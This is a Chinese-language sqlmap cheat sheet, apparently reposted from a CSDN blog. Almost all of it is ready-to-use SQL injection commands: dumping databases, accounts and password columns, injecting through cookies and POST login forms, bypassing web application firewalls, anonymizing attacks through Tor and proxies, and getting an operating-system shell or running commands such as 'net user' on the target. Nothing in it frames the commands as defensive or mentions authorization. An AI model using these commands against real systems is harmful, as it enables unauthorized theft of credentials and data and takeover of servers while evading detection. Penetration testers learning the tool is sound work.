sqlmap常用指令

Sqlmap笔记
sqlmap -u 注入点 检测注入点是否可用
sqlmap -u 注入点 –batch 自动输入
暴库
sqlmap -u 注入点 –dbs //暴库
Web当前使用的数据库
sqlmap -u 注入点 –current-db //爆当前使用的库
Web数据库使用的账户
sqlmap -u 注入点 –current-user //当前使用的账户
列出sqlserver所有用户
sqlmap -u 注入点 –users // 列出所有使用过的账户
数据库账户与密码
sqlmap -u 注入点 –passwords //mysql的登录账户和密码
列出数据库中的表
sqlmap -u 注入点 -D 指定数据库名 –tables //(-D指定数据库名称)
列出表中字段
sqlmap -u 注入点 -D 指定数据库名 -T 指定的表名 –columns
爆字段内容
sqlmap -u 注入点 -D 指定数据库名 -T 指定表名 -C “email,username,userpassword” –dump (将结果导出)
指定导出特定范围字段内容
sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword”–start 1 –stop 10 –dump (1,10行数)
Cookie注入
sqlmap -u “注入点” –cookie “id=97” –level 2
sqlmap -u “注入点” –table –cookie “id=97” –level 2
sqlmap -u “注入点” –columns -T “user” –cookie “id=97” –level 2
sqlmap -u “注入点” –dump -C “username,password”–columns -T “user” –cookie “id=97” –level 2
可对以上参数进行结合使用
python sqlmap.py -u “注入点” -f –banner –dbs –users

post登陆注入 mssql

sqlmap.py -u “http://” –data “tfUName=12345&tfUPass=12345”

sqlmap.py -u “http:” –data “tfUName=12345&tfUPass=12345” –dbs ==获取数据库名

sqlmap.py -u “http://” –data “tfUName=12345&tfUPass=12345” –tables -D “数据库名” ==列表

sqlmap.py -u “http://” –data “tfUName=12345&tfUPass=12345” –columns -T “表名” -D “数据库名” ==暴字段

sqlmap.py -u “http://” –data “tfUName=12345&tfUPass=12345” –dump –columns -C “字段,字段” -T “表” -D “数据名” ==暴字段内容

伪静态注入
注入点:http://.html (注意:要加个* 哪里存在注入就加上 * 号)

sqlmap.py -u http://*.html –dbs ==获取数据库名

sqlmap.py -u http://*.html –tables -D “数据名” ==获取数据库当中的表

sqlmap.py -u http://*.html –columns -D “数据名” -T “表名” ==获取数据库的表中的字段

sqlmap.py -u http://*.html –dump -D “数据名” -T “表名” -C “字段,字段” ==获取数据库的表中的字段内容

绕过防火墙注入
确认是否开了WAF
Sqlmap -u “注入点” –thread 10 –identify-waf (首选)
sqlmap -u “注入点” –thread 10 –check-waf 备选
使用参数绕过
Sqlmap -u “注入点” –random-agent -v 2 (浏览器绕过)
Sqlmap -u “注入点” –hpp -v 3 (参数污染绕过)
Sqlmap -u “注入点” –delay=3.5 –time-sec=60
Sqlmap -u “注入点” –proxy=211.211.211.211.8080 –proxy-cred=211.:985 代理注入
sqlmap -u “注入点” –ignore-proxy 禁止用代理注入,直接注入
sqlmap -u “注入点” –flush-session 清空会话,重构注入
sqlmap -u “注入点” -hex 或者–no-cast 进行字符码转换
sqlmap -u “注入点” –mobile 对移动端的服务器进行注入
sqlmap -u “注入点” –tor 匿名注入

直接拿shell或者执行命令(需要权限很大跟物理路径)

sqlmap.py -u url –os-shell

sqlmap.py -u url –os-cmd=ipconfig

请求延时(一般突破防火墙)

第一种方法:sqlmap.py -u url –delay 2 (注意:2是两秒的意思,也就是说2秒访问一次)
第二种方法: sqlmap.py -u url –safe-freq 3 (注意:3是3次的意思。。)

可以组合使用 sqlmap.py -u url –delay 2 –safe-freq 3

测试注入点权限:
sqlmap -u url –privileges

执行shell命令命令
sqlmap -u url –os-cmd=”net user” //执行netuser命令
sqlmap -u url –os-shell //系统交互的shell
欢迎加我们qq群639882908!!!!!!!!!!!!!!!!!!!!

猜你喜欢

转载自blog.csdn.net/a_running_snail_/article/details/80749568